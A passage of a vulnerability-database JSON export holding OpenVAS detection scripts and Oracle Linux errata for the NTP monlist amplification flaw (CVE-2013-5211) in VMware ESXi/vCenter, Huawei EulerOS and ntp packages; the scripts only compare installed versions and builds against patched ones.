ESXi 5.5 without patch ESXi550-201403101-SG\n\n VMware ESXi 5.1 without patch ESXi510-201404101-SG\n\n VMware ESXi 5.0 without patch ESXi500-201405101-SG\n\n VMware ESXi 4.1 without patch ESXi410-201404401-SG\n\n VMware ESXi 4.0 without patch ESXi400-201404401-SG\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"vmware_esx.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"VMware/ESXi/LSC\"))\n exit(0);\n\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))\n exit(0);\n\npatches = make_array(\"5.5.0\", \"VIB:esx-base:5.5.0-1.15.1623387\",\n \"5.1.0\", \"VIB:esx-base:5.1.0-2.27.1743201\",\n \"5.0.0\", \"VIB:esx-base:5.0.0-3.47.1749766\",\n \"4.0.0\", \"ESXi400-201404401-SG\",\n \"4.1.0\", \"ESXi410-201404401-SG\");\n\nif(!patches[esxVersion])\n exit(99);\n\nif(report = esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-26T08:48:41", "description": "VMware vSphere updates to third party libraries", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "VMSA-2014-0002 VMware vSphere updates to third party libraries", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:103917", "href": "http://plugins.openvas.org/nasl.php?oid=103917", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vcenter_VMSA-2014-0002.nasl 6663 2017-07-11 09:58:05Z teissa $\n#\n# VMware Security Updates for vCenter Server (VMSA-2013-0012)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"VMware vSphere updates to third party libraries\";\n\ntag_solution = \"Apply the missing patch(es).\";\ntag_affected = \"VMware vCenter Server 5.5 prior 5.5 Update 1 \";\ntag_vuldetect = \"Check the build number.\";\ntag_insight = 'a. DDoS vulnerability in NTP third party libraries\n\nThe NTP daemon has a DDoS vulnerability in the handling of thE\n\"monlist\" command. An attacker may send a forged request to a\nvulnerable NTP server resulting in an amplified response to the\nintended target of the DDoS attack. \n\nb. Update to ESXi glibc package\n\nThe ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to\nresolve a security issue.\n\nc. vCenter and Update Manager, Oracle JRE 1.7 Update 45\n\nOracle JRE is updated to version JRE 1.7 Update 45, which addresses\nmultiple security issues that existed in earlier releases of Oracle\nJRE.';\n\nif (description)\n{\n script_id(103917);\n script_cve_id(\"CVE-2013-5211\",\"CVE-2013-4332\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version (\"$Revision: 6663 $\");\n script_name(\"VMSA-2014-0002 VMware vSphere updates to third party libraries\");\n\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 14:24:01 +0100 (Wed, 12 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\",\"VMware_vCenter/build\");\n\n script_tag(name : \"vuldetect\" , value : tag_vuldetect);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n\n exit(0);\n\n}\n\ninclude(\"vmware_esx.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\"))exit(0);\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\"))exit(0);\n\nfixed_builds = make_array( \"5.5.0\",\"1623099\" );\n\nif ( ! fixed_builds[ vcenter_version] ) exit( 0 );\n\nif ( int( vcenter_build ) < int( fixed_builds[ vcenter_version ] ) )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build: fixed_builds[vcenter_version], typ:'vCenter' ) );\n exit(0);\n} \n\nexit(99);\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-27T10:49:00", "description": "VMware has updated vSphere third party libraries.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "VMSA-2014-0002 VMware vSphere updates to third party libraries", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2017-07-12T00:00:00", "id": "OPENVAS:103915", "href": "http://plugins.openvas.org/nasl.php?oid=103915", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_VMSA-2014-0002.nasl 6692 2017-07-12 09:57:43Z teissa $\n#\n# VMSA-2014-0002: VMware vSphere updates to third party libraries\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \" VMware has updated vSphere third party libraries.\";\ntag_solution = \"Apply the missing patch(es).\";\n\ntag_affected = \"vCenter Server Appliance 5.5 prior to 5.5 Update 1\nVMware vCenter Server 5.5 prior 5.5 Update 1\nVMware Update Manager 5.5 prior 5.5 Update 1\nVMware ESXi 5.5 without patch ESXi550-201403101-SG\";\n\ntag_vuldetect = \"Checks for missing patches.\";\n\ntag_insight = 'a. DDoS vulnerability in NTP third party libraries\n\nThe NTP daemon has a DDoS vulnerability in the handling of the\n\"monlist\" command. An attacker may send a forged request to a\nvulnerable NTP server resulting in an amplified response to the\nintended target of the DDoS attack. \n\nb. Update to ESXi glibc package\n\nThe ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to\nresolve a security issue.\n\nc. vCenter and Update Manager, Oracle JRE 1.7 Update 45\n\nOracle JRE is updated to version JRE 1.7 Update 45, which addresses\nmultiple security issues that existed in earlier releases of Oracle\nJRE.';\n\n\nif (description)\n{\n script_id(103915);\n script_cve_id(\"CVE-2013-5211\",\"CVE-2013-4332\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version (\"$Revision: 6692 $\");\n script_name(\"VMSA-2014-0002 VMware vSphere updates to third party libraries\");\n\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:57:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 14:04:01 +0100 (Wed, 12 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esxi_init.nasl\");\n script_mandatory_keys(\"VMware/ESXi/LSC\",\"VMware/ESX/version\");\n\n script_tag(name : \"vuldetect\" , value : tag_vuldetect);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n\n}\n\ninclude(\"vmware_esx.inc\");\ninclude(\"version_func.inc\");\n\nif(!get_kb_item('VMware/ESXi/LSC'))exit(0);\nif(!esxVersion = get_kb_item(\"VMware/ESX/version\"))exit(0);\n\npatches = make_array(\"5.5.0\",\"VIB:esx-base:5.5.0-1.15.1623387\",\n \"4.0.0\",\"ESXi400-201404401-SG\",\n \"4.1.0\",\"ESXi410-201404401-SG\");\n\nif(!patches[esxVersion])exit(0);\n\nif(_esxi_patch_missing(esxi_version:esxVersion, patch:patches[esxVersion])) {\n\n security_message(port:0);\n exit(0);\n\n}\n\nexit(99);\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:48:40", "description": "VMware has updated vSphere third party libraries.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "openvas", "title": "VMSA-2014-0002 VMware vSphere updates to third party libraries (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2013-4332"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:103916", "href": "http://plugins.openvas.org/nasl.php?oid=103916", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_VMSA-2014-0002_remote.nasl 6663 2017-07-11 09:58:05Z teissa $\n#\n# VMSA-2014-0002: VMware vSphere updates to third party libraries (remote check)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \" VMware has updated vSphere third party libraries.\";\ntag_solution = \"Apply the missing patch(es).\";\n\ntag_affected = \"vCenter Server Appliance 5.5 prior to 5.5 Update 1\nVMware vCenter Server 5.5 prior 5.5 Update 1\nVMware Update Manager 5.5 prior 5.5 Update 1\nVMware ESXi 5.5 without patch ESXi550-201403101-SG\";\n\ntag_vuldetect = \"Check the build number.\";\n\ntag_insight = 'a. DDoS vulnerability in NTP third party libraries\n\nThe NTP daemon has a DDoS vulnerability in the handling of thE\n\"monlist\" command. An attacker may send a forged request to a\nvulnerable NTP server resulting in an amplified response to the\nintended target of the DDoS attack. \n\nb. Update to ESXi glibc package\n\nThe ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to\nresolve a security issue.\n\nc. vCenter and Update Manager, Oracle JRE 1.7 Update 45\n\nOracle JRE is updated to version JRE 1.7 Update 45, which addresses\nmultiple security issues that existed in earlier releases of Oracle\nJRE.';\n\n\nif (description)\n{\n script_id(103916);\n script_cve_id(\"CVE-2013-5211\",\"CVE-2013-4332\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version (\"$Revision: 6663 $\");\n script_name(\"VMSA-2014-0002 VMware vSphere updates to third party libraries (remote check)\");\n\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2014-0002.html\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-12 14:04:01 +0100 (Wed, 12 Mar 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esx_web_detect.nasl\");\n script_mandatory_keys(\"VMware/ESX/build\",\"VMware/ESX/version\");\n\n script_tag(name : \"vuldetect\" , value : tag_vuldetect);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n\n}\n\ninclude(\"vmware_esx.inc\");\n\nif( ! esxVersion = get_kb_item( \"VMware/ESX/version\" ) ) exit( 0 );\nif( ! esxBuild = get_kb_item( \"VMware/ESX/build\" ) ) exit( 0 );\n\nfixed_builds = make_array( \"5.5.0\",\"1623387\" );\n\nif( ! fixed_builds[esxVersion] ) exit( 0 );\n\nif( int( esxBuild ) < int( fixed_builds[esxVersion] ) )\n {\n security_message(port:0, data: esxi_remote_report( ver:esxVersion, build: esxBuild, fixed_build: fixed_builds[esxVersion] ) );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2020-05-06T01:07:29", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-04-30T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1547)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-7427", "CVE-2016-7428"], "modified": "2020-04-30T00:00:00", "id": "OPENVAS:1361412562311220201547", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201547", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1547\");\n script_version(\"2020-04-30T12:13:13+0000\");\n script_cve_id(\"CVE-2013-5211\", \"CVE-2016-7427\", \"CVE-2016-7428\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-30 12:13:13 +0000 (Thu, 30 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-30 12:13:13 +0000 (Thu, 30 Apr 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1547)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.2\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1547\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1547\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2020-1547 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.(CVE-2013-5211)\n\nThe broadcast mode replay prevention functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via a crafted broadcast mode packet.(CVE-2016-7427)\n\nntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via the poll interval in a broadcast packet.(CVE-2016-7428)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.2.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.2.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h15\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h15\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h15\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-07-21T19:55:15", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-07-03T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1723)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2016-7427", "CVE-2016-7428"], "modified": "2020-07-03T00:00:00", "id": "OPENVAS:1361412562311220201723", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201723", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1723\");\n script_version(\"2020-07-03T06:18:48+0000\");\n script_cve_id(\"CVE-2013-5211\", \"CVE-2016-7427\", \"CVE-2016-7428\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-03 06:18:48 +0000 (Fri, 03 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-03 06:18:48 +0000 (Fri, 03 Jul 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1723)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.6\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1723\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1723\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2020-1723 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013.(CVE-2013-5211)\n\nThe broadcast mode replay prevention functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via a crafted broadcast mode packet.(CVE-2016-7427)\n\nntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via the poll interval in a broadcast packet.(CVE-2016-7428)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS Virtualization 3.0.6.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.6.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h15.eulerosv2r7\", rls:\"EULEROSVIRT-3.0.6.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h15.eulerosv2r7\", rls:\"EULEROSVIRT-3.0.6.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h15.eulerosv2r7\", rls:\"EULEROSVIRT-3.0.6.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "oraclelinux": [{"lastseen": "2021-07-28T14:25:16", "description": "[4.2.6p5-10.0.1.el6_8.1]\n- add disable monitor to default ntp.conf [CVE-2013-5211]", "cvss3": {}, "published": "2016-09-09T00:00:00", "type": "oraclelinux", "title": "ntp security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2016-09-09T00:00:00", "id": "ELSA-2016-3613", "href": "http://linux.oracle.com/errata/ELSA-2016-3613.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-28T14:24:52", "description": "[4.2.6p5-22.0.1.el7_2.2]\n- add disable monitor to default ntp.conf [CVE-2013-5211]", "cvss3": {}, "published": "2016-09-09T00:00:00", "type": "oraclelinux", "title": "ntp security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2016-09-09T00:00:00", "id": "ELSA-2016-3612", "href": "http://linux.oracle.com/errata/ELSA-2016-3612.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-07-28T14:24:35", "description": "[4.2.6p5-15.0.1]\n- add disable monitor to default ntp.conf [CVE-2013-5211]\n[4.2.6p5-15]\n- fix buffer overflow in parsing of address in ntpq and ntpdc (CVE-2018-12327)\n[4.2.6p5-14]\n- fix CVE-2016-7429 patch to work correctly on multicast client (#1422973)\n[4.2.6p5-13]\n- fix buffer overflow in datum refclock driver (CVE-2017-6462)\n- fix crash with invalid unpeer command (CVE-2017-6463)\n- fix potential crash with invalid server command (CVE-2017-6464)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-19T00:00:00", "type": "oraclelinux", "title": "ntp security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2016-7429", "CVE-2017-6462", "CVE-2017-6463", "CVE-2017-6464", "CVE-2018-12327"], "modified": "2018-12-19T00:00:00", "id": "ELSA-2018-3854", "href": "http://linux.oracle.com/errata/ELSA-2018-3854.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T06:24:18", "description": "[4.2.6p5-12.0.1.el6_9.1]\n- add disable monitor to default ntp.conf [CVE-2013-5211]\n[4.2.6p5-12.el6_9.1]\n- fix buffer overflow in datum refclock driver (CVE-2017-6462)\n- fix crash with invalid unpeer command (CVE-2017-6463)\n- fix potential crash with invalid server command (CVE-2017-6464)\n[4.2.6p5-12]\n- don't limit rate of packets from sources (CVE-2016-7426)\n- don't change interface from received packets (CVE-2016-7429)\n- fix calculation of root distance again (CVE-2016-7433)\n- require authentication for trap commands (CVE-2016-9310)\n- fix crash when reporting peer event to trappers (CVE-2016-9311)\n[4.2.6p5-11]\n- don't allow spoofed packets to demobilize associations (CVE-2015-7979,\n CVE-2016-1547)\n- don't allow spoofed packet to enable symmetric interleaved mode\n (CVE-2016-1548)\n- check mode of new source in config command (CVE-2016-2518)\n- make MAC check resilient against timing attack (CVE-2016-1550)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-10-26T00:00:00", "type": "oraclelinux", "title": "ntp security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": 